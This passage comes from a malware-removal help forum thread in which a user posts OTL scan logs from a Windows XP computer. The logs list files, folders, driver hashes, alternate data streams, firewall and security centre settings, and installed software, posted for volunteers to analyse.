[2009/03/01 11:37:52 | 000,083,164 | -H-- | C] () -- C:\WINDOWS\System32\mlfcache.dat
[2009/01/05 14:44:10 | 000,053,248 | ---- | C] () -- C:\WINDOWS\bdoscandel.exe
[2008/10/01 12:37:45 | 000,000,000 | ---- | C] () -- C:\WINDOWS\System32\drivers\567d76cd.sys
[2008/08/22 17:51:47 | 000,000,256 | ---- | C] () -- C:\WINDOWS\System32\pool.bin
[2008/08/12 15:54:51 | 000,000,128 | ---- | C] () -- C:\Documents and Settings\Karim\Local Settings\Application Data\fusioncache.dat
[2008/08/12 15:35:23 | 000,000,314 | ---- | C] () -- C:\WINDOWS\hpbvspst.ini
[2008/08/12 15:35:08 | 000,001,145 | ---- | C] () -- C:\WINDOWS\hpbvnstp.ini
[2008/08/12 15:34:37 | 000,208,896 | ---- | C] () -- C:\WINDOWS\System32\HPP2800V.DLL
[2008/08/12 15:34:37 | 000,000,484 | ---- | C] () -- C:\WINDOWS\System32\HPP2800V.DAT
[2008/07/27 13:38:03 | 000,021,896 | ---- | C] () -- C:\Documents and Settings\Karim\Application Data\Valeurs séparées par des virgules (Windows).ADR
[2008/04/16 19:47:54 | 000,042,483 | ---- | C] () -- C:\WINDOWS\Icccodes.dat
[2008/02/20 17:33:51 | 000,010,240 | ---- | C] () -- C:\WINDOWS\System32\vidx16.dll
[2008/01/03 19:44:55 | 000,016,384 | ---- | C] () -- C:\WINDOWS\System32\FileOps.exe
[2007/06/08 21:39:17 | 000,000,664 | ---- | C] () -- C:\WINDOWS\System32\d3d9caps.dat
[2007/04/08 20:31:18 | 000,000,141 | ---- | C] () -- C:\WINDOWS\disney.ini
[2007/04/08 20:31:10 | 000,000,184 | ---- | C] () -- C:\WINDOWS\disneysy.ini
[2007/02/15 21:58:06 | 000,069,632 | ---- | C] () -- C:\WINDOWS\System32\xmltok.dll
[2007/02/15 21:58:06 | 000,036,864 | ---- | C] () -- C:\WINDOWS\System32\xmlparse.dll
[2006/12/25 12:03:47 | 000,000,040 | ---- | C] () -- C:\WINDOWS\NAVIGMA.INI
[2006/11/23 16:19:42 | 000,000,335 | ---- | C] () -- C:\WINDOWS\mozregistry.dat
[2006/10/18 17:11:16 | 000,000,012 | -H-- | C] () -- C:\WINDOWS\canptr.dll
[2006/10/18 17:11:16 | 000,000,003 | -H-- | C] () -- C:\WINDOWS\Hntxbin.dll
[2006/08/22 20:51:08 | 000,004,212 | -H-- | C] () -- C:\WINDOWS\System32\zllictbl.dat
[2006/06/16 07:44:51 | 000,001,755 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\QTSBandwidthCache
[2006/06/07 06:50:15 | 000,000,335 | ---- | C] () -- C:\WINDOWS\nsreg.dat
[2006/06/07 06:49:08 | 000,009,181 | ---- | C] () -- C:\WINDOWS\mozver.dat
[2006/04/06 19:52:47 | 000,000,120 | ---- | C] () -- C:\WINDOWS\Winchat.ini
[2006/03/22 18:51:48 | 000,000,305 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\addr_file.html
[2005/12/05 21:38:43 | 000,015,360 | ---- | C] () -- C:\WINDOWS\System32\BASSMOD.dll
[2005/11/26 18:29:42 | 000,089,088 | ---- | C] () -- C:\WINDOWS\System32\hpgt33.dll
[2005/08/09 22:00:14 | 000,000,339 | ---- | C] () -- C:\WINDOWS\PowerReg.dat
[2005/07/10 17:47:05 | 000,240,128 | ---- | C] () -- C:\Documents and Settings\Karim\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2005/07/08 21:11:11 | 000,053,248 | R--- | C] () -- C:\WINDOWS\System32\InstMed.exe
[2005/07/08 21:11:07 | 000,006,812 | ---- | C] () -- C:\WINDOWS\System32\lvcoinst.ini
[2005/07/08 21:11:06 | 000,585,824 | ---- | C] () -- C:\WINDOWS\System32\drivers\lvcm.sys
[2005/07/08 20:46:56 | 000,000,000 | ---- | C] () -- C:\WINDOWS\OpPrintServer.INI
[2005/07/08 17:32:44 | 000,000,202 | ---- | C] () -- C:\WINDOWS\NeroDigital.ini
[2005/07/08 09:08:18 | 000,000,039 | ---- | C] () -- C:\WINDOWS\popcinfo.dat
[2005/07/08 08:56:13 | 000,000,169 | ---- | C] () -- C:\WINDOWS\RtlRack.ini
[2005/07/08 08:06:51 | 000,005,600 | ---- | C] () -- C:\WINDOWS\System32\stci.dll
[2005/07/08 08:02:15 | 000,000,051 | ---- | C] () -- C:\WINDOWS\iTouch.ini
[2005/07/07 22:54:24 | 000,000,156 | ---- | C] () -- C:\WINDOWS\Kpcms.ini
[2005/07/07 22:54:17 | 000,039,095 | ---- | C] () -- C:\WINDOWS\Iccsigs.dat
[2005/07/07 22:54:15 | 000,210,944 | ---- | C] () -- C:\WINDOWS\System32\MSVCRT10.DLL
[2005/07/07 22:20:51 | 000,072,192 | ---- | C] () -- C:\WINDOWS\System32\Keygen-CloneDVD.exe
[2005/07/07 21:21:16 | 000,006,550 | ---- | C] () -- C:\WINDOWS\jautoexp.dat
[2005/07/07 20:52:55 | 000,000,164 | ---- | C] () -- C:\WINDOWS\avrack.ini
[2005/07/07 20:51:26 | 000,024,064 | ---- | C] () -- C:\WINDOWS\autoload.exe
[2005/07/06 17:51:53 | 000,000,385 | ---- | C] () -- C:\WINDOWS\ODBC.INI
[2005/07/06 00:07:28 | 000,002,048 | --S- | C] () -- C:\WINDOWS\bootstat.dat
[2005/07/06 00:03:32 | 000,021,892 | ---- | C] () -- C:\WINDOWS\System32\emptyregdb.dat
[2005/07/05 23:52:51 | 000,004,207 | ---- | C] () -- C:\WINDOWS\ODBCINST.INI
[2005/07/05 23:52:02 | 001,701,776 | ---- | C] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2004/08/31 16:07:56 | 000,061,440 | ---- | C] () -- C:\WINDOWS\System32\sockspy(2)(2).dll
[2004/08/02 14:20:40 | 000,004,569 | ---- | C] () -- C:\WINDOWS\System32\secupd.dat
[2004/05/08 18:54:56 | 000,016,384 | ---- | C] () -- C:\WINDOWS\winpopup.exe
[2003/05/29 08:55:44 | 000,045,056 | ---- | C] () -- C:\WINDOWS\System32\Uninstall.exe
[2003/05/29 08:55:18 | 000,040,960 | ---- | C] () -- C:\WINDOWS\System32\CSUninstall.exe
[2003/04/01 10:58:02 | 000,005,260 | ---- | C] () -- C:\WINDOWS\System32\OUTLPERF.INI
[2001/09/28 14:00:00 | 013,107,200 | ---- | C] () -- C:\WINDOWS\System32\oembios.bin
[2001/09/28 14:00:00 | 000,673,088 | ---- | C] () -- C:\WINDOWS\System32\mlang.dat
[2001/09/28 14:00:00 | 000,513,094 | ---- | C] () -- C:\WINDOWS\System32\perfh00C.dat
[2001/09/28 14:00:00 | 000,444,054 | ---- | C] () -- C:\WINDOWS\System32\perfh009.dat
[2001/09/28 14:00:00 | 000,322,810 | ---- | C] () -- C:\WINDOWS\System32\perfi00C.dat
[2001/09/28 14:00:00 | 000,272,128 | ---- | C] () -- C:\WINDOWS\System32\perfi009.dat
[2001/09/28 14:00:00 | 000,218,003 | ---- | C] () -- C:\WINDOWS\System32\dssec.dat
[2001/09/28 14:00:00 | 000,086,300 | ---- | C] () -- C:\WINDOWS\System32\perfc00C.dat
[2001/09/28 14:00:00 | 000,072,312 | ---- | C] () -- C:\WINDOWS\System32\perfc009.dat
[2001/09/28 14:00:00 | 000,046,258 | ---- | C] () -- C:\WINDOWS\System32\mib.bin
[2001/09/28 14:00:00 | 000,034,108 | ---- | C] () -- C:\WINDOWS\System32\perfd00C.dat
[2001/09/28 14:00:00 | 000,028,626 | ---- | C] () -- C:\WINDOWS\System32\perfd009.dat
[2001/09/28 14:00:00 | 000,004,463 | ---- | C] () -- C:\WINDOWS\System32\oembios.dat
[2001/09/28 14:00:00 | 000,001,804 | ---- | C] () -- C:\WINDOWS\System32\dcache.bin
[2001/09/28 14:00:00 | 000,000,741 | ---- | C] () -- C:\WINDOWS\System32\noise.dat

========== LOP Check ==========

[2010/04/24 11:17:16 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Alwil Software
[2010/02/11 21:39:11 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Bluetooth
[2007/12/02 17:34:15 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Downloaded Installations
[2009/01/24 21:18:41 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Gestion'Hair
[2009/12/29 16:42:37 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Installations
[2007/09/29 20:07:58 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\n7-89-o9-3r-4t-r9
[2010/03/17 16:47:40 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\NCH Swift Sound
[2008/01/25 20:20:00 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Nokia
[2009/12/29 16:54:44 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\OviInstallerCache
[2007/12/02 18:05:03 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\PC Suite
[2006/01/28 21:10:38 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Samsung
[2011/05/11 13:11:17 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\TEMP
[2010/02/04 18:46:47 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\TomTom
[2010/04/27 17:16:48 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Western Digital
[2009/09/06 16:59:31 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\WinZip
[2007/09/23 18:50:23 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Zylom
[2008/11/21 12:52:40 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\{3276BE95_AF08_429F_A64F_CA64CB79BCF6}
[2007/07/07 20:29:22 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\BitTorrent
[2008/11/12 11:42:42 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\Blackberry Desktop
[2007/12/02 14:04:58 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\Datalayer
[2011/05/11 10:07:44 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\FileZilla
[2007/09/30 13:30:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\GameHouse
[2007/12/26 18:46:58 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\gtk-2.0
[2007/09/29 20:16:57 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\Inkscape
[2010/03/17 16:47:33 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\NCH Swift Sound
[2006/04/06 19:44:22 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\NGSoft
[2010/01/27 18:25:24 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\Nokia
[2011/05/11 09:26:54 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\Notepad++
[2008/01/03 19:54:22 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\Opera
[2008/08/22 18:23:37 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\PC Suite
[2007/11/01 14:17:47 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\PowerChallenge
[2007/07/03 22:02:14 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\profette
[2008/08/22 17:52:01 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\Research In Motion
[2010/02/15 18:43:45 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\SendBlaster2
[2010/02/04 18:45:32 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\TomTom
[2006/07/04 13:23:04 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\XnView
[2007/09/25 10:05:45 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\Zylom
[2007/11/18 17:10:26 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim iPod\Application Data\Desperate Housewives
[2007/06/05 20:46:39 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim iPod\Application Data\MPEG Streamclip
[2007/12/07 22:03:08 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim iPod\Application Data\PC Suite
[2011/03/28 11:18:00 | 000,000,512 | ---- | M] () -- C:\WINDOWS\Tasks\Ad-Aware Update (Weekly).job

========== Purity Check ==========

Re: Request for analysis of reports

Post by bea23 » 11 May 2011, 16:06

OTL REPORT (continued)

========== Custom Scans ==========


< %SYSTEMDRIVE%\*.exe >
[2007/05/29 10:09:02 | 000,930,816 | ---- | M] () -- C:\hb32.exe


< MD5 for: AGP440.SYS >
[2004/08/19 16:20:54 | 018,782,711 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp2.cab:AGP440.sys
[2008/09/04 17:47:22 | 023,892,017 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp3.cab:AGP440.sys
[2004/08/19 16:20:54 | 018,782,711 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp2.cab:AGP440.sys
[2008/09/04 17:47:22 | 023,892,017 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp3.cab:AGP440.sys
[2008/09/04 17:47:22 | 023,892,017 | ---- | M] () .cab file -- C:\WINDOWS\SoftwareDistribution\Download\23ec66f2314a80d718b5483ab6e865af\sp3.cab:AGP440.sys
[2008/04/13 20:36:38 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\ServicePackFiles\i386\agp440.sys
[2008/04/13 20:36:38 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\SoftwareDistribution\Download\23ec66f2314a80d718b5483ab6e865af\agp440.sys
[2008/04/13 20:36:38 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\system32\drivers\agp440.sys
[2004/08/03 23:07:42 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=2C428FA0C3E3A01ED93C9B2A27D8D4BB -- C:\WINDOWS\$NtServicePackUninstall$\agp440.sys
[2004/08/03 23:07:42 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=2C428FA0C3E3A01ED93C9B2A27D8D4BB -- C:\WINDOWS\system32\ReinstallBackups\0003\DriverFiles\i386\AGP440.SYS

< MD5 for: ATAPI.SYS >
[2004/08/19 16:20:54 | 018,782,711 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp2.cab:atapi.sys
[2008/09/04 17:47:22 | 023,892,017 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp3.cab:atapi.sys
[2004/08/19 16:20:54 | 018,782,711 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp2.cab:atapi.sys
[2008/09/04 17:47:22 | 023,892,017 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp3.cab:atapi.sys
[2008/09/04 17:47:22 | 023,892,017 | ---- | M] () .cab file -- C:\WINDOWS\SoftwareDistribution\Download\23ec66f2314a80d718b5483ab6e865af\sp3.cab:atapi.sys
[2008/04/13 20:40:30 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\ServicePackFiles\i386\atapi.sys
[2008/04/13 20:40:30 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\SoftwareDistribution\Download\23ec66f2314a80d718b5483ab6e865af\atapi.sys
[2008/04/13 20:40:30 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\system32\drivers\atapi.sys
[2004/08/03 22:59:44 | 000,095,360 | ---- | M] (Microsoft Corporation) MD5=CDFE4411A69C224BD1D11B2DA92DAC51 -- C:\WINDOWS\$NtServicePackUninstall$\atapi.sys
[2004/08/03 22:59:44 | 000,095,360 | ---- | M] (Microsoft Corporation) MD5=CDFE4411A69C224BD1D11B2DA92DAC51 -- C:\WINDOWS\system32\ReinstallBackups\0002\DriverFiles\i386\atapi.sys


< %systemroot%\*. /mp /s >

< %systemroot%\system32\*.dll /lockedfiles >
[2008/04/14 04:33:24 | 000,380,445 | ---- | M] (Microsoft Corporation) Unable to obtain MD5 -- C:\WINDOWS\system32\expsrv.dll
[2001/09/28 14:00:00 | 001,355,776 | ---- | M] (Microsoft Corporation) Unable to obtain MD5 -- C:\WINDOWS\system32\Msvbvm50.dll
[2008/04/14 04:33:33 | 001,384,479 | ---- | M] (Microsoft Corporation) Unable to obtain MD5 -- C:\WINDOWS\system32\msvbvm60.dll
[6 C:\WINDOWS\system32\*.tmp files -> C:\WINDOWS\system32\*.tmp -> ]

< %systemroot%\Tasks\*.job /lockedfiles >

========== Alternate Data Streams ==========

@Alternate Data Stream - 88 bytes -> C:\Documents and Settings\Karim\Application Data\Microsoft\Internet Explorer\Quick Launch\Bureau.scf:SummaryInformation
@Alternate Data Stream - 203 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:618D0840
@Alternate Data Stream - 147 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:75A3C24B
@Alternate Data Stream - 135 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:BEC0D766
@Alternate Data Stream - 129 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:E44DF565

< End of report >
bea23

Posts: 16
Joined: 11 May 2011, 08:49

Re: Request for analysis of reports

Post by bea23 » 11 May 2011, 16:07

OTL EXTRAS REPORT:

OTL Extras logfile created on: 11/05/2011 13:40:52 - Run 1
OTL by OldTimer - Version 3.2.22.3 Folder = C:\Documents and Settings\Karim\Bureau
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 0000080C | Country: Belgique | Language: FRB | Date Format: d/MM/yyyy

1.023,00 Mb Total Physical Memory | 506,00 Mb Available Physical Memory | 49,00% Memory free
2,00 Gb Paging File | 1,00 Gb Available in Paging File | 78,00% Paging File free
Paging file location(s): C:\pagefile.sys 768 1536 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 127,99 Gb Total Space | 64,78 Gb Free Space | 50,62% Space Free | Partition Type: NTFS
Drive E: | 3,83 Gb Total Space | 2,44 Gb Free Space | 63,74% Space Free | Partition Type: FAT32
Drive F: | 3,87 Gb Total Space | 3,83 Gb Free Space | 98,78% Space Free | Partition Type: FAT32
Drive G: | 1,86 Gb Total Space | 0,68 Gb Free Space | 36,61% Space Free | Partition Type: FAT

Computer Name: KARIM-PBDRK3C5J | User Name: Karim | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Extra Registry (SafeList) ==========


========== File Associations ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
.js [@ = JSFile] -- Reg Error: Value error. File not found

========== Shell Spawning ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
exefile [open] -- "%1" %*
jsfile [open] -- Reg Error: Value error.
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [ACDBrowse] -- C:\Program Files\ACDSee32\ACDSee32.exe "%1" (ACD Systems, Ltd.)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe /idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

========== Security Center Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = 1
"FirewallDisableNotify" = 0
"UpdatesDisableNotify" = 0
"AntiVirusOverride" = 1
"FirewallOverride" = 0

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]
"DisableMonitoring" = 1

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]

========== System Restore Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sr]
"Start" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SrService]
"Start" = 2

========== Firewall Settings ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
"1900:UDP" = 1900:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22007
"2869:TCP" = 2869:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22008

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 0
"DoNotAllowExceptions" = 0
"DisableNotifications" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"1900:UDP" = 1900:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22007
"2869:TCP" = 2869:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22008
"139:TCP" = 139:TCP:LocalSubNet:Disabled:@xpsp2res.dll,-22004
"445:TCP" = 445:TCP:LocalSubNet:Disabled:@xpsp2res.dll,-22005
"137:UDP" = 137:UDP:LocalSubNet:Disabled:@xpsp2res.dll,-22001
"138:UDP" = 138:UDP:LocalSubNet:Disabled:@xpsp2res.dll,-22002

========== Authorized Applications List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\Program Files\eMule\emule.exe" = C:\Program Files\eMule\emule.exe:*:Enabled:eMule
"C:\Program Files\Yahoo!\Messenger\YPager.exe" = C:\Program Files\Yahoo!\Messenger\YPager.exe:*:Enabled:Yahoo! Messenger
"C:\Program Files\Yahoo!\Messenger\YServer.exe" = C:\Program Files\Yahoo!\Messenger\YServer.exe:*:Enabled:Yahoo! FT Server
"C:\Program Files\Wilcom2\Ken Messenger\Wvoip.exe" = C:\Program Files\Wilcom2\Ken Messenger\Wvoip.exe:*:Enabled:Wvoip
"C:\Program Files\Wilcom2\Ken Messenger\Ken Messenger.exe" = C:\Program Files\Wilcom2\Ken Messenger\Ken Messenger.exe:*:Enabled:Instant Messanger Client
"C:\Program Files\SimpleComm\ngssc.exe" = C:\Program Files\SimpleComm\ngssc.exe:*:Enabled:ngssc
"C:\Program Files\BitTorrent\bittorrent.exe" = C:\Program Files\BitTorrent\bittorrent.exe:*:Enabled:BitTorrent
"C:\Program Files\IVT Corporation\BlueSoleil\BlueSoleil.exe" = C:\Program Files\IVT Corporation\BlueSoleil\BlueSoleil.exe:*:Enabled:BlueSoleil
"C:\Program Files\iTunes2\iTunes.exe" = C:\Program Files\iTunes2\iTunes.exe:*:Enabled:iTunes -- (Apple Inc.)


========== HKEY_LOCAL_MACHINE Uninstall List ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{036AA4D4-6D32-11D4-9875-00105ACE7734}" = Logiciel iTouch de Logitech
"{04AF207D-9A77-465A-8B76-991F6AB66245}" = Adobe Help Viewer CS3
"{08B32819-6EEF-4057-AEDA-5AB681A36A23}" = Adobe Bridge Start Meeting
"{0C826C5B-B131-423A-A229-C71B3CACCD6A}" = CDDRV_Installer
"{121634B0-2F4B-11D3-ADA3-00C04F52DD52}" = Windows Installer Clean Up
"{16976C6C-F8D5-4317-9DE8-1F6352B66725}" = RAW Image Task
"{184CE391-7E0E-4C63-9935-D7A10EDFD3C6}" = Adobe WinSoft Linguistics Plugin
"{1888DAFD-C634-4BC4-865C-3455E24F6177}" =
"{1A59064A-12A9-469F-99F6-04BF118DBCFF}" = Kaspersky PURE
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{205C6BDD-7B73-42DE-8505-9A093F35A238}" = Outil de téléchargement Windows Live
"{2075CB0A-D26F-4DAA-B424-5079296B43BA}" = Windows Live FolderShare
"{212748BB-0DA5-46DE-82A1-403736DC9F27}" = MSVC80_x86
"{22B775E7-6C42-4FC5-8E10-9A5E3257BD94}" = MSVCRT
"{26A24AE4-039D-4CA4-87B4-2F83216018FF}" = Java(TM) 6 Update 18
"{29E5EA97-5F74-4A57-B8B2-D4F169117183}" = Adobe Stock Photos CS3
"{2F81FBFC-9A37-431F-9050-14B55485DF5A}" = Internet Library
"{3101CB58-3482-4D21-AF1A-7057FC935355}" = KhalInstallWrapper
"{318AB667-3230-41B5-A617-CB3BF748D371}" = iTunes
"{350C97B8-3D7C-4EE8-BAA9-00BCB3D54227}" = WebFldrs XP
"{3741689E-584D-40C9-B011-373A0371846D}" = Nokia Software Updater
"{46ABBC54-1872-4AA3-95E2-F2C063A63F31}" = Installation Windows Live
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{4CE6B3C4-D8E2-4A5D-BEF5-5B69AF843B0C}" = PC Connectivity Solution
"{4CFB3821-1582-4F3B-BF8D-30986923B36B}" = Nokia Multimedia Factory
"{54793AA1-5001-42F4-ABB6-C364617C6078}" = Adobe Linguistics CS3
"{5809E7CF-4DCF-11D4-9875-00105ACE7734}" = Logitech MouseWare 9.79
"{5AAFE9B0-B60B-4B12-B22D-6B15507502E5}" =
"{5C474A83-A45F-470C-9AC8-2BD1C251BF9A}" = Skype™ 4.1
"{5CDC05F7-83E4-4611-AD3C-A6EB2100332A}" =
"{5CDDF96A-BC34-4D72-9ABA-E1FFF0C39977}" =
"{60036680-7CEC-4166-9739-B5A5DB0F5D15}" = ShadowProtect Desktop
"{67AEFC4C-69E4-11D7-85F4-00E018013273}" =
"{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}" = PowerDVD
"{6956856F-B6B3-4BE0-BA0B-8F495BE32033}" = Apple Software Update
"{6ABE0BEE-D572-4FE8-B434-9E72A289431B}" = Adobe Fonts All
"{6D3245B1-8DB8-4A23-9CD2-2C90F40ABAF6}" = MSVC80_x86_v2
"{6E08CE13-C2AB-4749-9335-5900B958929E}" = Adobe Illustrator CS3
"{6FF5DD7A-FE28-4439-B8CF-1E9AF4EA0A61}" = Adobe Asset Services CS3
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{73B5D990-04EA-4751-B10F-5534770B91F2}" = Adobe Color EU Recommended Settings
